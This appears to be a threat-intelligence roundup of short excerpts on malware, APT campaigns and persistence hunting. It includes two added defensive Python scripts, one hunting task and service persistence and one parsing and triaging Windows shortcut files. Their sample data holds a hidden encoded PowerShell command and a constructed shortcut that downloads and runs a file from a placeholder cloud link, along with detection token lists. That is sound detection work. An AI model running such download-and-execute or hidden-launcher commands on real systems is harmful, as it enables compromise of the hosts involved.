In December 2023, Sophos X-Ops received a report of a false positive detection on an executable signed by a valid Microsoft Hardware Publisher Certificate. However, the version info for the supposedly clean file looked a little suspicious.

Figure 1: Version info of the detected file. Note the typos ‘Copyrigth’ and ‘rigths’

The file’s metadata indicates that it is a “Catalog Authentication Client Service” by “Catalog Thales ” – possibly an attempt to impersonate the legitimate company Thales Group.…

Read More

Key Points

In early April 2024, ReliaQuest investigated numerous similar incidents targeting customers in the health care sector. We concluded that these intrusions form part of a new campaign targeting health care organizations with the goal of accessing banking information. The attacks used social engineering techniques against help desk staff to bypass account access controls.…
Read More

The world of cyber security faces new and more complex threats every day. Among them, one of the most significant is malicious software designed to steal personal and corporate information, known as “stealers”. Stealers can be considered one of today’s unseen yet most dangerous corporate threats.…

Read More
What’s happening?

Among today’s threats, the misuse of Windows Management Instrumentation (WMI) stands out as pervasive. WMI facilitates centralized management of Windows devices by providing a consistent, well-documented interface used by management applications from Microsoft and third-party vendors.…

Read More

You can’t talk about hunting for persistence techniques without mentioning scheduled tasks. As with persistence via Windows services, described in a previous blog post, scheduled-task techniques also lend themselves to a dual approach to persistence hunting:

Both the creation and execution of tasks can be hunted with simple yet different hypotheses, so let’s dive in and explore them.…

Read More

When discussing Windows services and how to hunt for their abuse, it is worth mentioning that several threat hunting hypotheses can be leveraged. This is common in threat hunting in general and for persistence-related techniques in particular.

As a reminder, all our service-related hypotheses can be split into two main groups: Hunting for service creation (aka “establishment” or “installation”) and Hunting for service execution (sometimes after the service is created/established).…

Read More

When discussing Windows services and how to hunt for their abuse, it is worth mentioning that there are several threat hunting hypotheses that we can leverage. This is very common in threat hunting tradecraft in general and for persistence-related techniques in particular.

When you are dealing with Windows services techniques, all your hypotheses can be split into two big groups: Hunting for service creation (aka “establishment” aka “installation”) and Hunting for service execution (some time after the service was created/established).…

Read More
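The creation/execution split described for scheduled tasks (above) and for Windows services (the two posts just above) can be turned into concrete hunting logic. The block below is an added example and not code from the original posts: it runs four hypotheses (H1/H2 for creation, H3/H4 for execution) over constructed, pre-normalized event records. The event IDs and field names are the real Windows/Sysmon ones, but every task name, service name, path and command line is made up for the illustration, and the user-writable-path and LOLBin heuristics are assumptions to tune against your own baseline.

```python
"""Hypothesis-driven hunt for scheduled-task and service persistence.

Creation hypotheses look at the events that record a new task (Security 4698)
or a new service (System 7045); execution hypotheses look at process creation
(Sysmon Event 1) whose parent is the Task Scheduler host or services.exe.
The records below are constructed and already normalized; in a real pipeline
the 4698 TaskContent XML and the Sysmon fields come from the log source.
"""
import re

EVENTS = [  # constructed sample data, not from any real host
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "Command": r"%windir%\system32\defrag.exe", "Arguments": "-c -h -k -g"},
    {"EventID": 4698, "TaskName": r"\OneDriveUpdater",
     "Command": r"C:\Users\alice\AppData\Roaming\update.exe", "Arguments": ""},
    {"EventID": 7045, "ServiceName": "Sense",
     "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"'},
    {"EventID": 7045, "ServiceName": "TelemetrySvc",
     "ImagePath": r"C:\ProgramData\telemetry\svc.exe"},
    {"EventID": 7045, "ServiceName": "hlpsvc",
     "ImagePath": r"%COMSPEC% /c powershell -nop -w hidden -enc SQBFAFgA"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",
     "Image": r"C:\Users\alice\AppData\Roaming\update.exe", "CommandLine": "update.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\services.exe",
     "ParentCommandLine": r"C:\Windows\system32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\services.exe",
     "ParentCommandLine": r"C:\Windows\system32\services.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\Explorer.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]

# Heuristics (assumptions to tune): environment variables seen in ImagePath/Command,
# living-off-the-land binaries, and directories a standard user can write to.
ENV = {"%windir%": r"c:\windows", "%systemroot%": r"c:\windows",
       "%comspec%": r"c:\windows\system32\cmd.exe", "%programdata%": r"c:\programdata"}
LOLBINS = {"powershell", "pwsh", "cmd", "mshta", "rundll32", "regsvr32",
           "wscript", "cscript", "certutil", "bitsadmin", "msiexec"}
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\public\\",
                 "\\perflogs\\", "\\$recycle.bin\\", "\\windows\\tasks\\")
# Task Scheduler host: split svchost instance ("-s Schedule") or legacy taskeng.exe
TASK_HOST = re.compile(r"svchost\.exe.*-s schedule\b|taskeng\.exe", re.I)

def normalize(cmd):
    s = cmd.lower().replace('"', "")
    for var, val in ENV.items():
        s = s.replace(var, val)
    return s

def in_user_writable(cmd):
    return any(m in normalize(cmd) for m in USER_WRITABLE)

def lolbin_in(cmd):
    """Return the first LOLBin name found among the command's tokens, else None."""
    for tok in normalize(cmd).split():
        name = tok.rsplit("\\", 1)[-1]
        if name.endswith(".exe"):
            name = name[:-4]
        if name in LOLBINS:
            return name
    return None

def reasons(cmd):
    why = []
    if in_user_writable(cmd):
        why.append("user-writable path")
    lb = lolbin_in(cmd)
    if lb:
        why.append("lolbin:" + lb)
    return why

def hunt_creation(events):
    """H1: suspicious task registered (4698). H2: suspicious service installed (7045)."""
    out = []
    for e in events:
        if e["EventID"] == 4698:
            why = reasons(e["Command"] + " " + e.get("Arguments", ""))
            if why:
                out.append(("H1 task created", e["TaskName"], why))
        elif e["EventID"] == 7045:
            why = reasons(e["ImagePath"])
            if why:
                out.append(("H2 service installed", e["ServiceName"], why))
    return out

def hunt_execution(events):
    """H3: child of the Task Scheduler host. H4: child of services.exe (Sysmon 1)."""
    out = []
    for e in events:
        if e["EventID"] != 1:
            continue
        parent = e["ParentImage"].lower().rsplit("\\", 1)[-1]
        if TASK_HOST.search(e["ParentCommandLine"]):
            tag = "H3 task execution"
        elif parent == "services.exe":
            tag = "H4 service execution"
        else:
            continue
        why = reasons(e["Image"] + " " + e["CommandLine"])
        if why:
            out.append((tag, e["Image"], why))
    return out

if __name__ == "__main__":
    for finding in hunt_creation(EVENTS) + hunt_execution(EVENTS):
        print(*finding)
```

Two practical caveats: Security 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled (System 7045 is logged by default), and the `-s Schedule` parent command line only appears where svchost hosts services in separate instances (Windows 10 1703 and later with enough memory); elsewhere, fall back on the Microsoft-Windows-TaskScheduler/Operational log (Events 200/201) to tie a process to the task that launched it.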

As cyber adversaries become more sophisticated, detecting and neutralizing potential threats before they can cause any harm has become a top priority for cybersecurity professionals. It is also why threat hunting is a crucial skill. By mastering the art of cyber threat hunting, security professionals can build a robust defense and shield their organization from the ever-persistent menace of cyber threats.…

Read More
Background

Huntress SOC analysts continue to see alerts indicating malicious activity on endpoints running MSSQL Server or MSSQL Express, either as stand-alone installations or bundled with a larger application package. A recent series of incidents across three endpoints running the Fortinet Enterprise Management Server (EMS) system was initiated by alerts as illustrated in Figure 1.…

Read More

Threat Actor: 🔥

Victim: 🎯

Information:

– The threat actor is offering the source code of AvEleminator software for sale.
– AvEleminator is a tool designed for malicious purposes, aiming to neutralize antivirus, endpoint protection platforms, and endpoint detection and response security software.
– The tool operates using certified signed drivers to bypass or disable security measures.…

Read More
Executive Summary

– Impersonating North Korea-related questionnaires, manuscript materials, security columns, contributions, monthly magazines, etc.
– Delivered by hiding an LNK-type malicious file inside a ZIP archive
– Exploiting cloud storage such as Dropbox and pCloud as a base for the attack
– Part of the APT37 group’s ongoing RoKRAT fileless attacks
– Early detection of the LNK and PowerShell stages with Genian EDR

1.…
Read More
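The LNK-inside-ZIP delivery summarized above is the stage the report says is caught early. The block below is an added example, not code from the Genians report: it parses the MS-SHLLINK structure of a shortcut (76-byte header, optional LinkTargetIDList and LinkInfo, then the StringData fields), pulls out the embedded command line and ShowCommand, and applies a few triage heuristics for hidden PowerShell launchers that fetch from cloud storage. Both shortcuts, and the Dropbox share path inside one of them, are constructed in memory; the token lists are assumptions to extend.

```python
"""Extract and triage the command line carried by a Windows shortcut (.lnk)."""
import struct

HDR_FMT = "<I16sIIQQQiiiHHII"           # ShellLinkHeader: 76 bytes, little-endian
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7                  # window opens minimized: common in malicious LNKs
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location"))   # on-disk order per MS-SHLLINK

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields plus ShowCommand of a shell link."""
    if len(data) < 76:
        raise ValueError("too short for a ShellLinkHeader")
    hdr = struct.unpack_from(HDR_FMT, data, 0)
    size, clsid, flags, show = hdr[0], hdr[1], hdr[2], hdr[9]
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link")
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    width = 2 if flags & IS_UNICODE else 1
    fields = {"show_command": show}
    for flag, name in STRING_DATA:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        raw = data[off:off + count * width]
        off += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields

# Triage heuristics (assumptions): launcher names, PowerShell evasion/download
# switches, and the cloud-storage providers the report names as staging bases.
LAUNCHER_TOKENS = ("powershell", "pwsh", "mshta", "cmd.exe", "cmd /c", "wscript", "cscript", "rundll32")
EVASION_TOKENS = ("-w hidden", "-windowstyle hidden", "-nop", "-enc", "iex",
                  "invoke-expression", "downloadstring", "iwr", "invoke-webrequest")
CLOUD_TOKENS = ("dropbox", "pcloud")

def triage_lnk(data: bytes) -> list:
    """List the indicators found in a shortcut's paths, arguments and ShowCommand."""
    f = parse_lnk(data)
    text = " ".join(f.get(k, "") for k in
                    ("relative_path", "working_dir", "arguments", "icon_location")).lower()
    hits = [t for t in LAUNCHER_TOKENS + EVASION_TOKENS if t in text]
    hits += ["cloud:" + t for t in CLOUD_TOKENS if t in text]
    if f["show_command"] == SW_SHOWMINNOACTIVE:
        hits.append("show_command=SW_SHOWMINNOACTIVE")
    return hits

def build_lnk(arguments: str, relative_path: str, show_command: int = 1) -> bytes:
    """Constructed sample shortcut: header, an empty IDList, then two StringData fields."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack(HDR_FMT, 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"          # only the TerminalID
    def sd(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + id_list + sd(relative_path) + sd(arguments)

# Constructed samples; the share id "CONSTRUCTED" is a placeholder, not a real URL.
MALICIOUS_LNK = build_lnk(
    arguments=r'-windowstyle hidden -nop -c "iwr https://www.dropbox.com/s/CONSTRUCTED/decoy.dat'
              r' -OutFile $env:TEMP\d.dat; iex (gc $env:TEMP\d.dat -Raw)"',
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(arguments="notes.txt",
                       relative_path=r"..\..\Windows\System32\notepad.exe")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, parse_lnk(blob).get("arguments"), triage_lnk(blob))
```

Real shortcuts usually also carry a LinkTargetIDList pointing at the launcher and an icon location borrowed from a document viewer; the parser skips the former by size and surfaces the latter as a field, so both can feed the same token matching. Triage the extracted command line rather than the file's extension or icon, since that is what actually runs when the user double-clicks the decoy.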
Threat Landscape

The encryptor has hit the scene recently, but without any notable leak site from the threat actor or typical ransomware branding. The ransomware note is not unique in the wording used, but it is clear the threat actor is masquerading as a pentester. This tactic has been used by other threat actors in the past and is not going to fool the victim when they come across the ransomware note on an encrypted system.…

Read More

Key Points

This report examines the threat posed by Chinese advanced persistent threat (APT) groups on operational technology (OT) by analyzing four key cyber attacks from the past 12 months conducted by threat actors with a China nexus (“APT27,” “APT31,” “BlackTech,” and “Volt Typhoon”). Network defenders may find the detection rules and key recommendations detailed throughout this report useful.…
Read More